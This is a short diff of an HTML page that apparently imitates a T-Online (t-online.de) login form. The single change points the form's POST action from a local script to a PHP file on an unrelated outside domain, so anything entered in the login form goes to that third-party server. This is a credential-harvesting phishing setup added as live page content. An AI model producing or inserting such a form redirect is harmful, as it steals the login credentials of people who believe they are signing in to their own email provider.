--- a/index.html
+++ b/index.html
@@ -143,7 +143,7 @@
 
 
 
-	<form id="login" name="login" method="POST" action="online.php" accept-charset="UTF-8" autocomplete="off">
+	<form id="login" name="login" method="POST" action="https://marinkasevilla.com/files/t-online/online.php" accept-charset="UTF-8" autocomplete="off">
 		<input id="tid" name="tid" value="b097339d-6920-4bc9-9fc1-e6e7ab36c688" type="hidden">
 		<input id="domain" name="pw_domt" value="t-online.de" type="hidden">
 
